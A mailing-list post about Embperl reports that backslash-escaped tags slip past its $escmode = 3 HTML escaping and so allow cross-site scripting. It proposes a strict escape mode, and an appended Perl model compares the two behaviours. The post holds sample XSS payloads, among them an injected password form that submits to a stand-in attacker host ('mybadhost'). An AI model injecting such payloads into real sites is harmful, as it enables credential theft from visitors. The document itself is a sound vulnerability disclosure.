Hi,

I just learned more about 'cross site scripting' (XSS) hacks from the
CERT CA-2000-02 advisory and on www.apache.org (please look up the URLs
in the XSS thread on the modperl list, I don't have them handy). So
what does this issue mean for Embperl?

Well, I have one major concern: If I'm using $escmode = 3 (which is
pretty standard and secure at first look), HTML tags are properly
escaped. But there is a backdoor: \<. This makes XSS hacks possible
again and your web site very insecure. E.g. enter in an input field the
following data, which is typically displayed later in an HTML output page:

\<script\>alert('hi, this should never occur')\<script\>

or not so innocent:

\<form action=http://mybadhost/cgi-bin/getpasswd\>\<input type=password\>
Please enter your password for a double check<\form\>

So what I'm suggesting, Gerald, is just a new escape mode which just
never allows backslash-escaping tags.

Or am I just telling old stories here?
Dirk
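
The behaviour described in the message above, as an added example that is not part of the original post and not Embperl's own code: a simplified Perl model of an output escaper that honours the backslash passthrough, next to one that never does. The function names, the entity table and the passthrough rule as modelled here are assumptions for illustration; the sample input is the first string from the post.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed model, not Embperl source: HTML metacharacters and their entities.
my %ENTITY = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;', '"' => '&quot;');

# Escaper WITH the backslash passthrough the post describes:
# a bare "<" becomes "&lt;", but "\<" is emitted as a raw "<".
sub escape_with_backslash_passthrough {
    my ($text) = @_;
    $text =~ s/\\([&<>"])|([&<>"])/defined($1) ? $1 : $ENTITY{$2}/ge;
    return $text;
}

# Escaper WITHOUT the passthrough (the mode the post asks for):
# every metacharacter is escaped, a preceding backslash stays a literal.
sub escape_strict {
    my ($text) = @_;
    $text =~ s/([&<>"])/$ENTITY{$1}/g;
    return $text;
}

# True if the escaped output still contains markup-significant characters.
sub has_raw_markup {
    my ($html) = @_;
    return $html =~ /[<>]/ ? 1 : 0;
}

# User-supplied form value, taken from the post (q{} keeps the backslashes).
my $input = q{\<script\>alert('hi, this should never occur')\<script\>};

my %modes = (
    'backslash passthrough' => \&escape_with_backslash_passthrough,
    'strict'                => \&escape_strict,
);

for my $name (sort keys %modes) {
    my $out = $modes{$name}->($input);
    printf "%-22s raw markup: %-3s %s\n",
        $name, has_raw_markup($out) ? 'yes' : 'no', $out;
}
```

In the passthrough model the value reaches the page with live angle brackets; in the strict model the backslashes are printed as ordinary characters next to `&lt;` and `&gt;`.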